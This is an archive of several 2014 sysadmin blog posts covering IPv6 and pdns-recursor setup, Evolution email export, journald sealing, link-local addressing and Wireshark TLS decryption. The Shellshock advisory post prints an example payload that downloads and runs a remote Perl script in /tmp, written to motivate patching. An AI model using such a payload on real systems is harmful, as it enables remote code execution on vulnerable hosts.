Sunday, October 26, 2014

How to configure pdns-recursor to support IPv6 and configure Unique Local Address in a Stateless Address Configuration network

In this article, we will learn how to configure pdns-recursor. Because I have a stateless auto configuration from my ISP, each time my router rebooted, I get different IPv6 subnet. In this case, we will use a private address for our network. In IPv6, it is known as unique local address or ULA. There will be some steps involve and be patient and follow this article, hopefully in the end, you will enjoy the benefit too as I did.

First, let's generate ULA for our network. There are several ways to generate and I provided you a few.

First three commands, it is generated from the web and the last is a command you can generate via terminal. As an example for this article, I will use the following.
Network       = fd2e:66b6:60c8:: / 64
Netmask = ffff:ffff:ffff:ffff::
Wildcard Mask = ::ffff:ffff:ffff:ffff
Hosts Bits = 64
Max. Hosts = 18446744073709551616 (2^64 - 1)
Host Range = { fd2e:66b6:60c8::1 - fd2e:66b6:60c8:0:ffff:ffff:ffff:ffff }

Next we will set IP address accordingly to the system. We will have a server and a client. To make simple and easy for this article, we will use the example previously by extending to the server and client. Let's choose now.

server fd2e:66b6:60c8::192:168:133:20
client fd2e:66b6:60c8::192:168:133:90

Notice the IP address, the address end with address from IPv4. easier to remember. hopefully. To test quickly, we can set the server and client using the following command.
server => ip -6 addr add fd2e:66b6:60c8::192:168:133:20/64 dev eth0
client => ip -6 addr add fd2e:66b6:60c8::192:168:133:90/64 dev wlan0

Now down the road, if you are happy, you might want to make it permanent so the setting survive over a system reboot. To make it permanent, it is depending on the operating system you are using. I will show you how I do it in ubuntu (server) and debian (client).

In ubuntu, add addtional entry in /etc/network/interfaces
iface eth0 inet6 static
pre-up modprobe ipv6
address fd2e:66b6:60c8::192:168:133:20
netmask 64

In debian, using network-manager applet, go to the IPv6 Settings tab. See screenshot.


Method, select Automatic, addresses only. We want only the public IPv6 address from router but in the DNS servers field, provide the server IP address. In this example fd2e:66b6:60c8::192:168:133:20. Save the settings and close the windows.

Right now your client should have public IPv6 address and DNS from server configured. But what about the private IP for this client? Because when the interface is bring up, we will set the wireless lan interface for the ip. network-manager will call the script in /etc/network/if-up.d/. So add a script to set the address accordingly. Example
user@localhost:~$ cat /etc/network/if-up.d/addPrivateIPv6 


if [ "$IF" = "wlan0" ]; then
case "$STATUS" in
logger -s "NM Script up triggered"
logger -s "NM Script up triggered"
ip -6 addr add fd2e:66b6:60c8::192:168:133:90/64 dev wlan0
logger -s "NM Script down triggered"
logger -s "NM Script pre-up triggered"
logger -s "NM Script post-down triggered"

The important is when the interface is wlan0 and status is up, the address will be set accordingly. Okay, we will check now in the server and client. You can use the command ip addr show.
   eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:00:00:00:00:00 00 ff:ff:ff:ff:ff:ff
inet brd scope global eth0
valid_lft forever preferred_lft forever
inet6 2001:0:0:0:0:0:0:0/64 scope global dynamic
valid_lft 86397sec preferred_lft 14397sec
inet6 fd2e:66b6:60c8::192:168:133:20/64 scope global
valid_lft forever preferred_lft forever
inet6 fe80::0:0:0:0/64 scope link
valid_lft forever preferred_lft forever

wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP qlen 1000
link/ether 00:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff
inet brd scope global wlan0
valid_lft forever preferred_lft forever
inet6 fd2e:66b6:60c8::192:168:133:90/64 scope global
valid_lft forever preferred_lft forever
inet6 2001:0:0:0:0:0:0:0/64 scope global dynamic
valid_lft 86396sec preferred_lft 14396sec
inet6 fe80::0:0:0:0/64 scope link
valid_lft forever preferred_lft forever

So all good, the server and client get SLAAC address from router and they have their own private IP address. Fantastic!

Next, I will assume that you have pdns-recursor  installed and configured. If you don't, it is as easily as apt-get install pdns-recursor. To resolve IPv6 address correctly, below are some configuration you need to change.

edit this file /etc/powerdns/recursor.conf and change the following.

  • aaaa-additional-processing=yes
    turn off processing for ipv6

  • allow-from=,,, ::1/128, fe80::/10, fd2e:66b6:60c8::/64
    allow dns query from localhost, link local and the subnet fd2e:66b6:60c8. This is an example, change the subnet address accordingly to your settings.

  • local-address=,,, ::1, fd11:b788:830f:8dc2:
    local address of the system. Again, as this is an example, you should change to your value.

  • query-local-address6=fd11:b788:830f:8dc2:
    your system local address. Again, as this is an example, you should change to your value.

Now restart pdns-recursor and check syslog if there is any error.

We are good, we done with the configuration. Now one last step, we test it!
user@localhost:~$ dig aaaa @fd11:b788:830f:8dc2:

; <<>> DiG 9.8.4-rpz2+rl005.12-P1 <<>> aaaa @fd11:b788:830f:8dc2:
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 7269
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0


;; ANSWER SECTION: 300 IN AAAA 2404:6800:4001:805::1000

;; Query time: 34 msec
;; SERVER: fd11:b788:830f:8dc2:
;; WHEN: Fri Sep 26 21:42:23 2014
;; MSG SIZE rcvd: 56

voila, it works! :)

Saturday, October 25, 2014

Why is CVE-2014-7169 is important and you should patch your system

Recently I have come across this link and read about it. Before we go into the details. Let's understand what is it.

From Red Hat errata

It was found that the fix for CVE-2014-6271 was incomplete, and Bash still
allowed certain characters to be injected into other environments via
specially crafted environment variables. An attacker could potentially use
this flaw to override or bypass environment restrictions to execute shell
commands. Certain services and applications allow remote unauthenticated
attackers to provide environment variables, allowing them to exploit this
issue. (CVE-2014-7169)

So let's check my system. Hmm.. my local host is affected :-)
jason@localhost:~$ env x='() { :;}; echo vulnerable'  bash -c "echo this is a test"
this is a test
jason@localhost:~$ whoami

But what is this important? the user still using his own privileged. It turn out to be this exploit allow remote attacker to execute the script remotely. Let's change the script a bit.
() { :;}; /bin/bash -c "cd /tmp;wget;curl -O ; perl /tmp/jur;rm -rf /tmp/jur"

See the point? Does it look scarry? A remote script is downloaded to your system, and execute it. So any local services that use shell for interpretation basically is vulnerable and you should patch bash as soon as possible. As of this moment of writing, the patch is out. In CentOS 7, the patched is included in the package bash-4.2.45-5.el7_0.4.x86_64. Read the changelog below.
* Thu Sep 25 2014 Ondrej Oprala <> - 4.2.45-5.4
- CVE-2014-7169
Resolves: #1146324

Below are some service which uses bash and if your system use some of it, you should know what to do.

  • ForceCommand is used in sshd configs to provide limited command execution capabilities for remote users. This flaw can be used to bypass that and provide arbitrary command execution. Some Git and Subversion deployments use such restricted shells. Regular use of OpenSSH is not affected because users already have shell access.

  • Apache server using mod_cgi or mod_cgid are affected if CGI scripts are either written in Bash, or spawn subshells. Such subshells are implicitly used by system/popen in C, by os.system/os.popen in Python, system/exec in PHP (when run in CGI mode), and open/system in Perl if a shell is used (which depends on the command string).

  • PHP scripts executed with mod_php are not affected even if they spawn subshells.

  • DHCP clients invoke shell scripts to configure the system, with values taken from a potentially malicious server. This would allow arbitrary commands to be run, typically as root, on the DHCP client machine.

  • Various daemons and SUID/privileged programs may execute shell scripts with environment variable values set / influenced by the user, which would allow for arbitrary commands to be run.

  • Any other application which is hooked onto a shell or runs a shell script as using Bash as the interpreter. Shell scripts which do not export variables are not vulnerable to this issue, even if they process untrusted content and store it in (unexported) shell variables and open subshells.

Thanks, that's it for this article. Be good and stay safe.

Friday, October 24, 2014

How to organize old emails in evolution

Today, we are going to take it slow, my mind is just exhausted for analyzing or any programming. Today, we will do something simple. We will export our emails out.

So why export emails? If you have been working for years, I'm sure emails your email client will have a lot of emails. But you do not want to delete it yet do not want it to be in your mail client. So is there a way to make those email out of mail client yet you can import later day if you need it.

If you are using evolution, read on. This article is going to tell you how to do export emails from evolution mail client. It is very easy and only a few steps away.

As you may have notice, evolution only has an import command under File. See screenshot below.


In order to export out emails, you will need to select emails in the mail folder. See screenshot below, I have group email into different companies with different date in year.


To export,

  1. select all emails in the mail folder.

  2. click File then Save as mbox... and provide some descriptive name to the save file.

That's it! You can now delete emails in evolution and keep the exported email somewhere safe.

Should you need the email from the exported file, you can import back. In the screenshot above, there is a import command. Click on that and follow the window assistance, you can easily retrieve your email back into mail client.

That's it. I hope you learned something.

Sunday, October 12, 2014

Enable FSS in journald and verify using journalctl

Last we learned the basic of journalctl, today we will enable FSS in journald.

Forward Secure Sealing or FSS allows application to cryptographically "seal" the system logs in regular time intervals, so that if your machine is hacked the attacker cannot alter log history (but can still entirely delete it). It works by generating a key pair of "sealing key" and "verification key".


Okay, let's set it up. With this, we will use CentOS 7 for learning.

As root, let's setup the keys.
[root@centos7-test1 ~]# journalctl --setup-keys
/var/log/journal is not a directory, must be using persistent logging for FSS.

Hmm.. not possible because /run is mounted on tmpfs. We will now enable persistent storage for journald.

  1. as root, create directory # mkdir -p /var/log/journal 

  2. edit /etc/systemd/journald.conf and uncomment the following.

    1. Storage=persistence

    2. Seal=yes

  3. restart journald using command systemctl restart systemd-journald 

  4. Rerun command journalctl --setup-keys. See screenshot below.

  5. Now we verify the log using command
    [root@centos7-test1 ~]# journalctl --verify
    PASS: /var/log/journal/e25a4e0b618f43879af033a74902d0af/system.journal

Looks good. Although I am not sure what is the verify-key as different verify key is used, it is always passed. Probably it will be fail if the logging is tampered.

Saturday, October 11, 2014

Learning IPv6

Recently I was fortunate enough to enable IPv6 on the router and all connected devices are now with IPv6 addresses. You will ask why would one want to switch to use IPv6?

Let's start simple, look at the graph at , there is a trend growing in IPv6 adoption since mid yeer 2010. If that's not convincing enough to enable IPv6 in the router, then read on. I will explain based on the article found here.

First, what is IPv6?

Internet Protocol version 6 (IPv6) is the latest version of the Internet Protocol (IP), the communications protocol that provides an identification and location system for computers on networks and routes traffic across the Internet. IPv6 was developed by the Internet Engineering Task Force (IETF) to deal with the long-anticipated problem of IPv4 address exhaustion.

Because IPv4 address is exhausted with the current addresses usage trends, more devices released soon will not get be able to get a unique public address from IPv4 pool.

Below is a summary in points form of the facts of IPv6.

  •  As of June 2014, the percentage of users reaching Google services with IPv6 surpassed 4% for the first time.

  • IPv6 uses a 128-bit address, allowing 2128, or approximately 3.4 × 1038 addresses. whilst IPv4 used 32-bit address and provide only 4.3 billion addresses.

  • IPv4 and IPv6 are not interoperable and thus adoption has been slow. To expedite the adoption, there are transition mechanisms have been devised to permit communication between IPv4 and IPv6 hosts.

  • IPv6 was first formally described in Internet standard document RFC 2460, published in December 1998.

  • IPv6 simplifies aspects of address assignment (stateless address autoconfiguration), network renumbering and router announcements when changing network connectivity providers.

  • IPv6 simplifies processing of packets by routers by placing the need for packet fragmentation into the end points.

  • The standard size of a subnet in IPv6 is 264 addresses, the square of the size of the entire IPv4 address space.

  • IPv6 does not implement traditional IP broadcast, i.e. the transmission of a packet to all hosts on the attached link using a special broadcast address, and therefore does not define broadcast addresses. In IPv6, the same result can be achieved by sending a packet to the link-local all nodes multicast group at address ff02::1, which is analogous to IPv4 multicast to address

  • The IPv6 packet header has a fixed size (40 octets).

  • IPv4 limits packets to 65535 (216−1) octets of payload. An IPv6 node can optionally handle packets over this limit, referred to as jumbograms, which can be as large as 4294967295 (232−1) octets.

  • In the Domain Name System, hostnames are mapped to IPv6 addresses by AAAA resource records, so-called quad-A records.


IPv6 addresses are represented as 8 groups of four hexadecimal digits separated by colons, for example 2001:0db8:85a3:0042:1000:8a2e:0370:7334, but methods of abbreviation of this full notation exist.  Each group is written as 4 hexadecimal digits and the groups are separated by colons (:). IPv6 unicast addresses other than those that start with binary 000 are logically divided into two parts: a 64-bit (sub-)network prefix, and a 64-bit interface identifier.


For convenience, an IPv6 address may be abbreviated to shorter notations by application of the following rules, where possible.

  • One or more leading zeroes from any groups of hexadecimal digits are removed; this is usually done to either all or none of the leading zeroes. For example, the group 0042 is converted to 42.

  • Consecutive sections of zeroes are replaced with a double colon (::). The double colon may only be used once in an address, as multiple use would render the address indeterminate.

An example of application of these rules:

  • Initial address: 2001:0db8:0000:0000:0000:ff00:0042:8329

  • After removing all leading zeroes: 2001:db8:0:0:0:ff00:42:8329

  • After omitting consecutive sections of zeroes: 2001:db8::ff00:42:8329

The loopback address, 0000:0000:0000:0000:0000:0000:0000:0001, may be abbreviated to ::1 by using both rules.

Stateless Autoconfiguration

IPv6 lets any host generate its own IP address and check if it's unique in the scope where it will be used. IPv6 addresses consist of two parts. The leftmost 64 bits are the subnet prefix to which the host is connected, and the rightmost 64 bits are the identifier of the host's interface on the subnet. This means that the identifier need only be unique on the subnet to which the host is connected, which makes it much easier for the host to check for uniqueness on its own.

|Subnet Prefix 64 bits | Interface identifier 64 bits |

The mac address is used to derive the address for interface link local. I have written blog on how to do just that. please read here.

With the link-local derived, without the prefix fe80, and then use the remaining by concat with the network lan IPv6 prefix.

So an example of mac address 4c:33:22:11:aa:ee

Derived link local fe80::4e33:22ff:fe11:aaee

Public ip 2001:e68:5424:d2dd:4e33:22ff:fe11:aaee where 2001:e68:5424:d2dd is the network lan IPv6 prefix assigned by the router and 4e33:22ff:fe11:aaee is the local-link address without prefix fe80.

Dual IP stack implementation

Dual-stack (or native dual-stack) refers to side-by-side implementation of IPv4 and IPv6. That is, both protocols run on the same network infrastructure, and there's no need to encapsulate IPv6 inside IPv4 (using tunneling) or vice-versa. Dual-stack is defined in RFC 4213.

The dual-stack should only be considered as a transitional technique to facilitate the adoption and deployment of IPv6, as it has some major drawbacks and consequences: it will not only more than double the security threats from both IPv4 and IPv6 for the existing network infrastructure, but also ultimately overburden the global networking infrastructure with both dramatically increased Internet traffic. The ultimate objective is to deploy the single stack of IPv6 globally.

There are others which can be found in the wikipedia, but the above should get you started. It works for me the first time I enable IPv6 and it works wonder after that.

Friday, October 10, 2014

Derive IPv6 link-local address for network interface

When you show the interface configuration using command ip, you will noticed there is a inet6 address start with fe80. Today, we will learn what is this and how this address is derive. Example below
user@localhost:~$ ip addr show wlan0
3: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP qlen 1000
link/ether 4c:33:22:11:aa:ee brd ff:ff:ff:ff:ff:ff
inet brd scope global wlan0
valid_lft forever preferred_lft forever
inet6 2001:e68:5424:d2dd:4e33:22ff:fe11:aaee/64 scope global dynamic
valid_lft 86399sec preferred_lft 14399sec
inet6 fe80::4e33:22ff:fe11:aaee/64 scope link
valid_lft forever preferred_lft forever

So first, what is Link-local address?

In a computer network, a link-local address is a network address that is valid only for communications within the network segment (link) or the broadcast domain that the host is connected to.

Link-local addresses are usually not guaranteed to be unique beyond a single network segment. Routers therefore do not forward packets with link-local addresses.

For protocols that have only link-local addresses, such as Ethernet, hardware addresses that the manufacturer delivers in network circuits are unique, consisting of a vendor identification and a serial identifier.

Link-local addresses for IPv4 are defined in the address block, in CIDR notation. In IPv6, they are assigned with the fe80::/10 prefix.

So it is a wire address that is locally within a segment of a network and it is not routable beyond a router.

With this said, let's calculate link-local address.

1. take the mac address from ip command.
from above example 4c:33:22:11:aa:ee

2. add ff:fe in the middle of the current mac address.

3. reformat to IPv6 notation by concatenate two hex groups into one.

4. convert the first octet from hexadecimal to binary
4c -> 01001100

5. invert the bit at position 6, starting from left with first bit as 0.
01001100 -> 01001110

6. convert the octet back in step 5 back to hexadecimal
01001110 -> 4e

7. replace first octet with newly calculated from step 6.

8. prepend the link-local prefix

That's it.

Sunday, September 28, 2014

Learning getting ssl traffic using wireshark and analyze ssl traffic.

Today we are going to study ssl using trace from wireshark. As such, there are few efforts we will need to do and summarize as below.

  1. setup a web server that has ssl certificate configured.

  2. get the network traffic using wireshark.

  3. decode and analyze the network traffic using wireshark.

So first, what is SSL?

Transport Layer Security (TLS) and its predecessor, Secure Sockets Layer (SSL), are cryptographic protocols designed to provide communication security over the Internet.[1] They use X.509 certificates and hence asymmetric cryptography to authenticate the counterparty with whom they are communicating, and to exchange a symmetric key.

If you already have a web server with ssl certicate configured, you can skip step 1. This is the documentation which I used primarily. You may not succeed on the first attempt as it took me several attempts to get the ssl traffic decrypted.  Words of advice, just do not give up.

1. setup a web server that has ssl certificate configured.

With this, you can either get the certificate from an authority or you can generate one. If you do not know how, you can google or you can request in the comment, maybe in the future, I will write a simple one. But here, I assume you have the certicate ready.

In the web server, with apache httpd being the most common, edit the configuration file. In the apache directory, edit the ssl.conf. Example.
<apache httpd directory>/sites-available/default-ssl.conf

SSLCertificateFile /etc/apache2/sites-available/abc_cert.pem
SSLCertificateKeyFile /etc/apache2/sites-available/abc_private_key.pem

change to according where you place the certificate and its private key. Enable this site and restart apache httpd and then you are set. I won't go into details for troubleshoothing problem if you encounter as this is not the main focus of this article and should leave as an exercise.

2. get the network traffic using wireshark.

Make sure wireshark that is currently installed has GnuTLS compiled. You can check using command below. The output must have GnuTLS and Gcrypt available.
$ wireshark --version | grep GnuTLS
with GnuTLS 2.12.23, with Gcrypt 1.5.3, with MIT Kerberos, with GeoIP, with
1.6.1, with libz 1.2.8, GnuTLS 2.12.23, Gcrypt 1.5.4, without AirPcap.

Then now launch wireshark using root. Ignore about the warnings or information you receive during launch wireshark as root. Note, you can also using dumpcap when you need to capture in the server, but I have not verify if this solution is working. $ sudo dumpcap -i wlan0 -f 'host and tcp port 443' . Probably not because you need to configure the server private key and the client (browser) random key. That should leave as another exercise.
$ sudo wireshark

There are some fields black out for obvious reason, we want to protect the server and client. But it should be self descriptive when you complete the steps as mentioned here.

We will first configure section in ssl configuration so that wireshark will be able to decrypt the data traffic. As such, you will need the server private key, which you can get from step 1 above. To configure that, go to Edit then Preferences... see screenshot below.


A window from Wireshark: Preferences pop up. Now on the left menu, expand the Protocols in the tree and look for SSL.  See screenshot below.


First, we will configure RSA keys list. Click on the Edit... button. Then another window pop up. Now add the server key. There are four out of five fields you need to fill in. See screenshot below for final output. Here I will explain the fields.


IP addressThe IP address of the SSL server in IPv4 or IPv6 format, or the following special values: any, anyipv4, anyipv6, Put your server hostname or ip address if you know.
PortThe TCP port number, or the special value start_tls or 0. For web server, normally it run on port 443 and in this example, I gave port 443 because it is a remote server listening https traffic on port 443.
ProtocolA protocol name for the decrypted network data. Popular choices are http or data. If you enter an invalid protocol name an error message will show you the valid values. Because http data are encrypted using ssl, thus, we should put value http here.
Key Filepath to the RSA private key. So locate where you put the server private key at your local workstation and then select the file here.
Passwordonly needed when the private key is in format PCKS#12 (typically a file with a .pfx or .p12 extension). In step 1, the server private key is in format PEM and thus, for this field, you can leave it empty. Saved by clicking OK. Click on Apply and then OK.

The next field we are going to configure is the SSL debug file. This is a file written by this ssl module and I recommend you put a valid value here. You can tail this file later when the capture is started and you can inspect this file quickly (on the fly) when the decryption is happening. It is very good when your ssl decryption went wrong and this serve as a source of debug.

You should check the following fields.

  • Reassemble SSL records spanning multiple TCP segments

  • Reassemble SSL Application Data spanning multiple SSL records

Leave the field Message Authentication Code (MAC), ignore "mac failed and Pre-Shared-Key as is.

For the last field, (Pre)-Master-Secret log filename, fill in a value where in the next step, you will configure for the web browser environment. This is a file written by the client (web browser in our example) which is used by the client as a key to encrypt the data. Wireshark will read this file to decrypt the data.

That's it for the configuration, click on Apply button and OK button.

Now open another terminal and we will setup the environment so that client (browser) will dump the random key. Browser chromium will start to dump the keys to the file premaster.txt.
user@localhost:~$ export SSLKEYLOGFILE=/home/user/premaster.txt
user@localhost:~$ chromium

Now tail the ssl debug file and this premaster file in another two terminal tabs and watch the progress.

Right now, we will capture the traffic. To do that, click on Capture from the menu then Options... See the screenshot below. Set the configuration correctly, I check wlan0 because this is a laptop where the https request will flow to and fro within this channel. Capture filter, put on the host and the IP address of the web server where you configure in step 1 above. In this example, my server ip address is, so host


To start the capture, click on the Start button.

Now, trigger a https call to the server from the web browser (in this example, chromium) and watch wireshark capture and decrypt the https data! Check also the tabs in terminal when debug log and premaster.txt are rolling. Click on stop button when you are satisfy with the https request.

3. decode and analyze the network traffic using wireshark.

From step 2 above, you are now have a complete ssl dumped and it is decrypted! See screenshot below. You may have noticed that SSL data has another tab at the bottom know as Decrypted SSL data. In this screenshot, it is 9000bytes. Pretty awesome I must say.


Right click on the row of packet which has protocol TLSv1 and click on Follow SSL Stream. It will show the encrypted ssl traffic (https) which has been decrypted into a http traffic.

That's it folks. I hope you learn something and please visit on donation page to donate to us.